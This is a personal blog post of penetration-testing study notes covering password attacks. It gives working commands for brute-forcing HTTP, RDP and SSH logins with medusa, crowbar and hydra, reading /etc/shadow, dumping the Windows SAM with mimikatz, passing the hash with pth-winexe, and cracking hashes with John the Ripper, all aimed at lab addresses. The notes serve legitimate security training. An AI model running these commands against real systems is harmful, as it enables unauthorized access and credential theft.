<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="Study Notes - 2021/07/06"><meta name="keywords" content="Study Notes,Penetration Testing"><meta name="author" content="Gavin Cui"><meta name="copyright" content="Gavin Cui"><title>Study Notes - 2021/07/06 | Gavin's Blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  hexoVersion: '5.4.0'
} </script><meta name="generator" content="Hexo 5.4.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#HTTP-htaccess-password-attack-with-medusa"><span class="toc-number">1.</span> <span class="toc-text">HTTP htaccess password attack with medusa</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#password-Attack-against-Remote-Desktop-Protocal-with-crowbar"><span class="toc-number">2.</span> <span class="toc-text">password Attack against Remote Desktop Protocal with crowbar</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SSH-Attack-with-THC-Hydra"><span class="toc-number">3.</span> <span class="toc-text">SSH Attack with THC-Hydra</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#HTTP-post-attack-with-THC-Hydra"><span class="toc-number">4.</span> <span class="toc-text">HTTP post attack with THC-Hydra</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Retrieve-Password-hashes"><span class="toc-number">5.</span> <span class="toc-text">Retrieve Password hashes</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Passing-the-hash-in-windows"><span class="toc-number">6.</span> <span class="toc-text">Passing the hash in windows</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Password-cracking"><span class="toc-number">7.</span> <span class="toc-text">Password cracking</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#use-john-with-linux-password"><span class="toc-number">7.1.</span> <span class="toc-text">use john with linux password</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">Gavin Cui</div><div class="author-info__description text-center">No Description</div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">29</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">11</span></a></div></div></div><div id="content-outer"><div class="no-bg" id="top-container"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Gavin's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">Study Notes - 2021/07/06</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2021-07-06</time></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="HTTP-htaccess-password-attack-with-medusa"><a href="#HTTP-htaccess-password-attack-with-medusa" class="headerlink" title="HTTP htaccess password attack with medusa"></a>HTTP htaccess password attack with medusa</h1><p>decompress the rockyou wordlist:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo gunzip &#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;rockyou.txt.gz</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">medusa -h 10.11.0.22 -u admin -P &#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;rockyou.txt -M http -m DIR:&#x2F;admin</span><br></pre></td></tr></table></figure>

<h1 id="password-Attack-against-Remote-Desktop-Protocal-with-crowbar"><a href="#password-Attack-against-Remote-Desktop-Protocal-with-crowbar" class="headerlink" title="password Attack against Remote Desktop Protocal with crowbar"></a>password Attack against Remote Desktop Protocal with crowbar</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">crowbar -b rdp -s 10.11.0.22&#x2F;32 -u admin -C ~&#x2F;password-file.txt -n 1  </span><br></pre></td></tr></table></figure>

<p>-n number of threads<br>-b protocal<br>-s host<br>-u username<br>-C wordlist  </p>
<p>rdp does not reliably handle multiple threads, so we use single thread </p>
<h1 id="SSH-Attack-with-THC-Hydra"><a href="#SSH-Attack-with-THC-Hydra" class="headerlink" title="SSH Attack with THC-Hydra"></a>SSH Attack with THC-Hydra</h1><p>-l target username<br>-P wordlist<br>protocal://IP  </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra -l kali -P test_wdlist.txt ssh:&#x2F;&#x2F;127.0.0.1</span><br></pre></td></tr></table></figure>



<h1 id="HTTP-post-attack-with-THC-Hydra"><a href="#HTTP-post-attack-with-THC-Hydra" class="headerlink" title="HTTP post attack with THC-Hydra"></a>HTTP post attack with THC-Hydra</h1><p>obtain addtional info about http-form-post options</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">hydra http-form-post -U </span><br><span class="line"></span><br><span class="line">&lt;url&gt;:&lt;form parameters&gt;:&lt;condition string&gt;[:&lt;optional&gt;[:&lt;optional&gt;]</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra 10.11.0.22 http-form-post &quot;&#x2F;form&#x2F;frontpage.php:user&#x3D;admin&amp;pass&#x3D;^PASS^:INVALID LOGIN&quot; -l admin -P &#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;rockyou.txt -vV -f</span><br></pre></td></tr></table></figure>
<p>request verbose output with -vV, and use -f to stop the attack when the first successful result is found.</p>
<h1 id="Retrieve-Password-hashes"><a href="#Retrieve-Password-hashes" class="headerlink" title="Retrieve Password hashes"></a>Retrieve Password hashes</h1><p><code>hashid &lt;hashvalue&gt;</code> to identify hash type  </p>
<p>inspect /etc/shadow file </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo grep root &#x2F;etc&#x2F;shadow</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root:$6$18cMHZ.mB57eU82l$lim7jazX00mXUZEB43IOtlHmpFcuTrceOJ1QObdaGr5fwsfsEryh5xcuJEpH7qOyiOmQHcGkn33vhy66GQDAi1:18696:0:99999:7:::</span><br></pre></td></tr></table></figure>
<p>the first of which ($6) references the SHA-512 algorithm  </p>
<ul>
<li>$1 = MD5 hashing algorithm.</li>
<li>$2 =Blowfish Algorithm is in use.</li>
<li>$2a=eksblowfish Algorithm</li>
<li>$5 =SHA-256 Algorithm</li>
<li>$6 =SHA-512 Algorithm<br>18cMHZ.mB57eU82l the salt  </li>
</ul>
<p>SAM database cannot be copied while the operating system is running because the Windows kernel keeps an exclusive file system lock on the file.</p>
<p>mimikatz modules facilitate password hash extraction from the Local Security Authority Subsystem (LSASS) process memory where they are cached.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">C:\Tools\password_attacks\mimikatz.exe</span><br><span class="line">&gt; privilege::debug</span><br><span class="line">&gt; token::elevate</span><br><span class="line">&gt; lsadump::sam</span><br></pre></td></tr></table></figure>
<p>token::elevate command to elevate the security token from high integrity (administrator) to SYSTEM integrity. If mimikatz is launched from a SYSTEM shell, this step is not required.  </p>
<p>use lsadump::sam to dump the contents of the SAM database</p>
<h1 id="Passing-the-hash-in-windows"><a href="#Passing-the-hash-in-windows" class="headerlink" title="Passing the hash in windows"></a>Passing the hash in windows</h1><p>The Pass-the-Hash (PtH) technique (discovered in 1997) allows an attacker to authenticate to a<br>remote target by using a valid combination of username and NTLM/LM hash rather than a clear<br>text password. This is possible because NTLM/LM password hashes are not salted and remain<br>static between sessions. Moreover, if we discover a password hash on one target, we cannot only<br>use it to authenticate to that target, we can use it to authenticate to another target as well, as long<br>as that target has an account with the same username and password.</p>
<p>Security Accounts Manager (SAM)  </p>
<p>To do this, we will use pth-winexe from the Passing-The-Hash toolkit (a modified version of winexe), which performs authentication using the SMB protocol</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pth-winexe -U offsec%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e &#x2F;&#x2F;10.11.0.22 cmd</span><br></pre></td></tr></table></figure>

<p>Question: what does “aad3b435b51404eeaad3b435b51404ee” do ? why there are two hashes?<br>aad3b435b51404eeaad3b435b51404ee: Empty LM HASH <code>&lt;LM hash&gt;:&lt;NTLM hash&gt;</code>    </p>
<p>NTLM hash algorithn:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">MD4(UTF-16-LE(password))</span><br></pre></td></tr></table></figure>

<p>Behind the scenes, the format of the NTLM hash we provided was changed into a NetNTLM<br>version 1 or 2 format during the authentication process. We can capture these hashes using<br>man-in-the-middle or poisoning attacks and either crack them or relay them</p>
<p><a target="_blank" rel="noopener" href="https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html">https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html</a>  </p>
<h1 id="Password-cracking"><a href="#Password-cracking" class="headerlink" title="Password cracking"></a>Password cracking</h1><p>recover clear text password from hash  </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">john hash.txt --format&#x3D;NT</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">john --wordlist&#x3D;&#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;rockyou.txt hash.txt --format&#x3D;NT</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">john --rules --wordlist&#x3D;&#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;rockyou.txt hash.txt --format&#x3D;NT</span><br></pre></td></tr></table></figure>

<h2 id="use-john-with-linux-password"><a href="#use-john-with-linux-password" class="headerlink" title="use john with linux password"></a>use john with linux password</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">grep victim &#x2F;etc&#x2F;passwd &gt; test_pw.txt</span><br><span class="line">sudo grep victim &#x2F;etc&#x2F;shadow &gt; test_shadow.txt</span><br><span class="line">unshadow test_pw.txt test_shadow.txt &gt; test_unshadow.txt</span><br><span class="line">john est_unshadow.txt</span><br></pre></td></tr></table></figure>

<p>john need the unshadow format as input hash  </p>
<p>I created a victim user, but the hash type is $y$ which can not be cracked </p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">Gavin Cui</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="https://gavincrz.github.io/2021/07/07/Study-Notes-2021-07-06/">https://gavincrz.github.io/2021/07/07/Study-Notes-2021-07-06/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/Study-Notes/">Study Notes</a><a class="post-meta__tags" href="/tags/Penetration-Testing/">Penetration Testing</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2021/07/08/Study-Notes-2021-07-07/"><i class="fa fa-chevron-left">  </i><span>Study Notes - 2021/07/07</span></a></div><div class="next-post pull-right"><a href="/2021/06/29/Arknights-Remote-Access/"><span>Arknights Remote Access</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2013 - 2021 By Gavin Cui</div><div class="framework-info"><span>Driven - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>